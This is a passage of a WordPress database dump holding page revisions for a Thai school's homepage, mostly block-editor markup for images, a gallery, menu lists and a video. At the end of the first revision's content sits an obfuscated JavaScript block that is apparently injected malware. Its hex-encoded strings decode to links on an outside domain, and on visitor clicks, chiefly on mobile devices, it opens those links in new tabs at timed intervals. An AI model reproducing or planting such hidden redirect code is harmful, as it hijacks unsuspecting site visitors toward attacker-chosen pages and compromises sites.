src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-27 21:24:52','2024-07-27 14:24:52','',19,'http://watprato.ssk.in.th/?p=73',0,'revision','',0),
(74,1,'2024-07-27 21:26:01','2024-07-27 14:26:01','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"bcb37a0b\",\"mediaId\":40,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-bcb37a0b\"><img class=\"gb-image gb-image-bcb37a0b\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/434878811_122134783502202781_1764078122862278595_n.jpg\" alt=\"\" title=\"434878811_122134783502202781_1764078122862278595_n\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-48e80028 gb-button-text\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"